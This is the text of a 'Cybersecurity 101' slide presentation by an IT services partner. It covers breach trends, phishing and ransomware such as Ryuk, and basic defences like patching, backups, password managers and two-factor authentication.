cybersecurity 101wphfma.org/wp-content/uploads/2016/04/250-pm-stone.pdfphishing – reputational...
TRANSCRIPT
Cybersecurity 101
Scott Stone, MACS
• IT Partner and CIO for ACT• 25 Years in the Industry• Cyber Threat Analyst – From NCFTA• Trained Ethical Hacker – EC Council• Certified in
• Network Security• Emergency Response Planning• Cisco, Sophos, Linux, Novell, etc.
2
Topics to be Covered
• IT Security Trends• Phishing / Ransomware• Protecting Your Organization
• Patching • Firewalls• Antivirus / AntiMalware• Backups• Pen Tests / Vulnerability Scans• Mobile Devices• Other Security Items• Policies and Procedures• Passwords / Managers / Two-Factor Authentication
3
Breached Records – First Half of 2015
4
Breached Records – First Half of 2016
5
Breached Records – First Half of 2017
6
Breached Records – First Half of 2018
7
2017 Breaches by Industry
8
2018 Breaches by Industry
9
Breach Incidents by Type – 2017
10
Breach Incidents by Type – 2018
11
Breach Incidents by Source – 2017
12
Breach Incidents by Source – 2018
13
This Happens Everywhere, Right?
2017
14
This Happens Everywhere, Right?
2018
15
Phishing Attacks
• Phishing uses social engineering, a technique where cyberattackers attempt to fool you into taking an action.
• These attacks often begin with a cyber criminal sendingyou an email pretending to be from someone or somethingyou know or trust, such as a friend, your bank, or yourfavorite online store.
• These emails then entice you into taking an action, such asclicking on a link, opening an attachment, or responding toa message.
• Cyber criminals craft these emails to look convincing.
Still the largest threat IT currently deals with.17
Phishing / Spear Phishing
WAS PRIMARILYCREDENTIALS ANDACCOUNT ACCESS
NOW MORERANSOMWARE / CRYPTOWARE
INCREASE IN THERESEARCH PEOPLE ARE
DOING PRIOR TOSENDING PHISHING
EMAILS
REDUCTION IN THEDUPLICATION OR
COMPLEXITY OF ACTUALEMAILS TO AVOID
LOOKING LIKE SPAM
TARGETEDATTACHMENTS AND
SUBJECTS BASED ONJOB ROLE
CRIMINALS AREPATIENT AND
THOROUGH BECAUSEIT PAYS TO BE
18
Phishing – Three Attack Types
1. Direct Money Theft2. Credential Theft3. Computer / Network InfectionWhat do these have in common?They make piles
of MONEY!19
Phishing Emails – Direct Money Theft
20
Phishing Emails – Credential Theft
21
Phishing Emails – Credential Theft
22
Phishing – Reputational Loss
Good Afternoon All,
This email comes as a warning regarding an email hack that we are experiencing. It has been brought to our attention that our CCO/CFO, Amy Smith, has had her email hacked. Steps are being taken right now to correct the situation.
Should you receive any correspondences from Amy Smith (AS@ABCWealthcom) requesting any kind of information— DO NOT OPEN! Either delete and/or call our office - ask to speak with either Amy or Bob Smith.
We apologize for any inconvenience and are working tirelessly to fix the problem.
Best,Sue JacksonMarketing ManagerABC Wealth Management
24
Phishing Emails – Ransomware Infection
25
Ransomware
Currently Ransomware commonly comes disguised as Email File Attachments:
• Invoice.doc or Invoice.zip
• Fax.doc or Fax.zip• Voicemail.wav or
Voicemail.zip• IRS Notice.zip
Or Download links:• UPS / FEDEX / USPS
notifications• Client files to Box,
Dropbox, Google drive, OneDrive
• Tax documents / Wells Fargo Documents
26
Ransomware
• 60% of Phishing emails we see lead to Ransomware. 20% each to Credential Theft or Direct Theft.
• Ransomware attacks are on the rise.
• FBI estimates Cyber Criminals will make over $11.5 billion in 2019.
• We have consulted on Ransomware infections for organizations from large hospitals to home businesses.
• Only options are to pay or restore from backups.
• Ransomware always results in downtime and lost productivity.
27
Ryuk Ransomware
• Ryuk ransomware banks $3.7 million in five months –Engadget 1/13/19
• Local manufacturer hit with 79 BTC ($282,583) ransom
• Crippled their US, Canadian, and UK sites
• Encrypted files on all their servers and their backups
• Attacked them again two months after initial infection
28
Ryuk Ransomware
• Starts by infecting systems with TrickBot malware (typically through methods like phishing email).
• Uses PowerShell and Remote Desktop Protocol to create backdoors and steal passwords.
• Lets the intruders study their targets to determine the money-making potential.
• They look for the most critical systems and will even pass on launching the Ryuk encryption if the organization isn't large enough.
• They target industries at different times (schools, local government, public housing, manufacturing).
29
Ransomware Distribution Methods
• Files Attached to Email• Common File Transfer Services:
• Dropbox• OneDrive• GoogleDrive• LeapFile• Sharefile
• What are the risks?
30
Protecting Yourself
• Be suspicious of attachments and only open those that youwere expecting.
• Pause and think about emails that impart a sense of urgency.• Just because you got an email from your friend does not mean
they sent it.• DO NOT CLICK ON LINKS IN EMAIL.• Not sure? Forward it to IT.• Train yourself:
• https://www.phishingbox.com/phishing-test• https://www.opendns.com/phishing-quiz/
31
Phishing – Protecting Yourself
Enable Enable two-factor authentication – O365, Google Authenticator, Security Key, SMS.
Train Train your employees and yourself – KnowBe4, Wombat, Sophos.
Use Use a quality email provider – Office365, Gmail, ProtonMail.
32
Patching
What is patching?Why is it important?What do I need to do?
33
Patching
• A Fully Patched Windows 7 or 10 computer was immune to 97% of all active attacks in 2018.
• The software industry is moving to an automatic patching model. Hardware and IOT are going to be slow to adopt this approach.
• Most Firewalls will not fully patch themselves automatically.• A software inventory system is a key component to tracking
unpatched systems. • Microsoft automatic patching is not reliable. (WSUS)• All software is vulnerable--e.g., WinRAR.
34
Firewalls
• Unified Threat Management (UTM) Firewalls at every Internet Connection
• UTM incorporates:• Antivirus Scanning• Country Blocking / Geo IP Filtering• Content Filtering • Intrusion Detection• Intrusion Prevention• Application Control / Blocking
• Internal Firewalls for Finance / EHR / HR35
Antivirus / Antimalware
• Must be centrally managed to be effective• Should automatically alert IT of infections• Heuristic AV clients are better than pattern based• AntiMalware technology can work with your Firewall to limit
access after an infection• Should be layered – Firewall / Server / PC• AI starting to impact this market
36
Backups
• Must include Off-site or Cloud backups.• Need to be disconnected from the network.• Restoration time is a business decision.• Local copies should be part of the strategy.• Needs to be encrypted – Who holds the keys?• Retention should be a primary part of the backup strategy.
37
Pen Test / Vulnerability Scans
• Penetration testing, also called pen testing or ethical hacking, is the practice of testing a computer system, network, or web application to find security vulnerabilities that an attacker could exploit.
• Vulnerability scanning is an inspection of the potential points of exploit on a computer or network to identify security holes.
38
Mobile Device Management
• The next target for thieves• SIM jacking is a real threat now• Corporate Assets vs Personal Devices• Security in this space is moving quickly• iPhone vs Android?
39
Mobile Devices – Personal Best Practices
• Keep it updated (IOS / Nexus).• Use a strong Pin / Passcode.• Be careful of the apps you install.• Dispose of old devices properly.• Be cautious of what you plug it into to charge.• Do not open attachments you do not need to
read on your phone.40
Other Security Concerns
• PowerShell on the desktop• VLANs are not real security• Local Admin rights to the computer• IT Staff running as Administrators• VPNS for Vendors (HVAC, Copiers, Security)• Network Managed Services Providers
41
Policies and Procedures
• What should you have?• Risk Analysis / Risk Assessment• Incident Response Plan / Log• Disaster Recovery Plan
• Other items:• Privacy Policy / Assessment• Security Policy / Assessment
42
Passwords and Two-Factor Authentication
Password Best Practices Review
01Password Managers, Haystacking, Passphrases
02Two-Factor –Types, Uses, Limitations, Benefits
03
43
Passwords: Protecting Yourself
Enable Enable Two-Factor Authentication.
Use Use a Password Manager such as LastPass.
Do not reuse Do not reuse Passwords for important sites.
44
Password Managers
A password manager is a software application or hardware that helps a user store and organize passwords. Password managers usually store passwords encrypted, requiring the user to create a master password: a single, ideally very strong password which grants the user access to their entire password database.
Examples:• LastPass• 1Password• KeePass• Lenovo Fingerprint Manager• HP Protect Tools 45
Excel as a Password Manager?
• Better than writing them down.
• Must set a strong master password.
• Be careful how you transfer it or store it.
• Backups are an issue.
46
Password Haystacking
• Every password you use can be thought of as a needle hiding in a haystack. After all searches of common passwords and dictionaries have failed, an attacker must resort to a “brute force” search –ultimately trying every possible combination of letters, numbers, and then symbols until the combination you chose is discovered.
• Example: LinkedIn4-=-=-=• Which of the following two passwords is stronger,
more secure, and more difficult to crack?D0g.....................
PrXyc.N(n4k77#L!eVdAfp9
47
Passphrases
• Instead of a Password consider using a Passphrase.• Examples:
• MydogsnameisRex• Securityisnotthathard• Ilove2learn!
• Longer passwords are better passwords.• Use a Password Manager to create long, secure,
unique passwords so you do not need to remember every one.
48
Ways to Stay Safe – Passwords
• Don’t reuse passwords.• Don’t type your password
into a public use machine.• If you do have to – change it
ASAP.
• Use a machine other than your kid’s gaming machine to check mail or log into Firm resources.
• Use a Password Manager.• Use Password Haystacking.
• Use Passphrases instead of Passwords.
• If you hear about a breach –change your password.
• Always be diligent about typing in passwords where people can see you type them in.
• Upgrade your operating system and keep it updated.
49
Two-Factor Authentication / Biometrics
Two-Factor Authentication Means:Something You Know
(Password)+
Something You Have(RFID Badge, SMS Message, Time-Based One-Time password,
Hardware Key-U2F) OR
Something You Are(Fingerprint, Retinal Scan, Palm Scanner, Facial Recognition,
Voice Recognition)50
Two-Factor Authentication / Biometrics
• Two-Factor Authentication aka 2FA or Multifactor Authentication
• Examples:• Pin Texted To Your Cell• Google Authenticator• RSA SecureID• Mobile App Authentication
• Biometrics• Fingerprint Scanner (Laptop,
iPhone, etc.)• Retinal Scanner• Hand Geometry• Facial Recognition
51
Best Apps For Two Factor
Google AuthenticatorDuo MobileMicrosoft AuthenticatorFree OTP
52
What about Security Questions?
Such as:• Mother’s maiden
name• City you were born in• Street you grew up on• Best friend’s name• Father’s middle name
Terrible – Answers available on Social Media
53
Physical Loss of Paper!
• Shredding
• Printing and Faxing
• Copies Sitting Out
• Secure Print & eFax
• Electronic Device Memory (copiers)
Think Low-Tech:27% of Breach incidents were
related to paper!
54
Where are you spending too much?
• Support Contracts – Cisco, Microsoft, Dell, HP• Data / Phone – Have you renegotiated in last 24 months?• Expertise – IT in General, Exchange • EHR – On Premise vs Cloud?• Data Centers – What is actually there?• Hosted Services – Journaling, Portals, etc.
55
CENTRALIZEDANTIVIRUS ON EVERYWORKSTATION AND
SERVER WITHACTIVE IT
NOTIFICATION
PATCH MANAGEMENTFOR EVERY PC AND
SERVER BOTHMICROSOFT AND THIRD
PARTY
FIREWALLPROTECTION WITH ANUP-TO-DATE PRODUCT
GOOD PASSWORDHYGIENE
SOLID BACKUPSINCLUDING CLOUD OR
OFF-SITE STORAGEIT
Security Basics
QUESTIONS?Scott Stone, MACSPartner – IT Servicesvoice: 724.658.1565 or 800.452.3003e-mail: [email protected]
Connect with ACT:
To help protect your privacy, PowerPoint has blocked automatic download of this picture.To help protect your privacy, PowerPoint has blocked automatic download of this picture.To help protect your privacy, PowerPoint has blocked automatic download of this picture.